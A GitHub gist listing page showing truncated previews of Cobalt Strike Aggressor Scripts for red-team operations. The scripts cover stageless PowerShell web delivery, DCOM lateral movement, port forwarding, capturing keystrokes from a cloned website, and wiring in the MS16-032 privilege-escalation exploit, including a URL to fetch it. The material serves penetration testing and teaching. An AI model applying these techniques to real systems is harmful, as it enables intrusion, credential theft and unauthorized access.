Raphael rsmudge
rsmudge
/ stagelessweb.cna
Last active
April 15, 2021 11:49
A stageless variant of the PowerShell Web Delivery attack. This script demonstrates the new scripting APIs in Cobalt Strike 3.7 (generate stageless artifacts, host content on Cobalt Strike's web server, build dialogs, etc.)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Scripted Web Delivery (Stageless) | |
| # | |
| # This script demonstrates some of the new APIs in Cobalt Strike 3.7. | |
| # setup our stageless PowerShell Web Delivery attack | |
| sub setup_attack { | |
| local('%options $script $url $arch'); | |
| %options = $3; | |
| # get the arch right. |
rsmudge
/ comexec.cna
Created
January 6, 2017 22:06
Lateral Movement with the MMC20.Application COM Object (Aggressor Script Alias)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Lateral Movement alias | |
| # https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/ | |
| # register help for our alias | |
| beacon_command_register("com-exec", "lateral movement with DCOM", | |
| "Synopsis: com-exec [target] [listener]\n\n" . | |
| "Run a payload on a target via DCOM MMC20.Application Object"); | |
| # here's our alias to collect our arguments | |
| alias com-exec { |
rsmudge
/ portfwd.cna
Created
October 13, 2016 00:18
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # port foreward alias in Beacon and SSH | |
| # | |
| # pull common code into a function | |
| sub _portfwd { | |
| if ($2 eq "stop") { | |
| btask($1, "Tasked session to stop forward to $3"); | |
| call("beacons.pivot_stop_port", $null, $3); | |
| } |
rsmudge
/ webkeystrokes.cna
Created
August 10, 2016 19:44
Shows how to pull keystrokes captured by website clone tool from Cobalt Strike's data model. Go to View -> Script Console. Type: load /path/to/webkeystrokes.cna. Then type 'pull'. This will present the information to you.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # convert comma separated keystroke values into a string. | |
| sub toString { | |
| local('@temp'); | |
| @temp = split(",", $1); | |
| shift(@temp); | |
| return join("", map({ | |
| return chr(parseNumber($1, 16, 10)); | |
| }, @temp)); | |
| } |
rsmudge
/ ms16-032.cna
Created
July 29, 2016 04:11
Quick and dirty script to integrate ms16-032 into Cobalt Strike and its workflows.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Quick script to integrate ms16-032 attack into Cobalt Strike's Beacon | |
| # | |
| # 0. the &beacon_host_script function was added in Cobalt Strike 3.4 (you need CS 3.4 or later) | |
| # 1. grab MS16-032.ps1 | |
| # https://gist.githubusercontent.com/benichmt1/af52401c7f2d6984dea6ba60b44aa1aa/raw/bc6f579e694fc9a752e1a1dd95886c464f575ee7/MS16-032.ps1 | |
| # 2. store it with this script | |
| # 3. Use 'ms16-032 "listener name"' or 'ms16-032' from Beacon to run this attack | |
| # logic to run this particular attack | |
| sub exploit { |
rsmudge
/ oneliner.cna
Created
July 7, 2016 21:07
How to host a large script via Beacon and grab it with a one-liner that connects to localhost.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # host a PowerShell script on a one-off web server via Beacon. | |
| # | |
| # Why? Generate one-liners for length constrained command execution opportunities | |
| # | |
| # NOTE: this uses internal APIs and is subject to break in the next release. Don't hate! | |
| # if there's interest in this capability, I can build an official API for it. | |
| import common.*; | |
| import beacon.*; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # demonstrate an example of inversion-of-control with Aggressor Script | |
| # | |
| # co-routine, | |
| sub bot { | |
| # run pwd and get the output. | |
| bpwd($bid); | |
| when("beacon_output_alt", $this); | |
| yield; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # getexplorerpid($bid, &callback); | |
| sub getanypid { | |
| bps($1, lambda({ | |
| local('$pid $name $entry'); | |
| foreach $entry (split("\n", $2)) { | |
| ($name, $pid) = split("\\s+", $entry); | |
| if ($name eq $proc) { | |
| # $1 is our Beacon ID, $pid is the PID of $proc | |
| [$callback: $1, $proc, $pid]; | |
| } |
rsmudge
/ getenv.cna
Last active
December 11, 2019 19:45
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # Aggressor Script means to parse/use environment vars in a Beacon session. | |
| # | |
| global('%bvars'); | |
| # request environment variables for every new Beacon that comes in. | |
| on beacon_initial { | |
| # ideally, we'd have a bshell that could take callbacks. We don't have | |
| # this yet. Eventually though, we will. |
rsmudge
/ getexplorer.cna
Created
March 18, 2016 20:47
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # getexplorerpid($bid, &callback); | |
| sub getexplorerpid { | |
| bps($1, lambda({ | |
| local('$pid $name $entry'); | |
| foreach $entry (split("\n", $2)) { | |
| ($name, $pid) = split("\\s+", $entry); | |
| if ($name eq "explorer.exe") { | |
| # $1 is our Beacon ID, $pid is the PID of explorer.exe | |
| [$callback: $1, $pid]; | |
| } |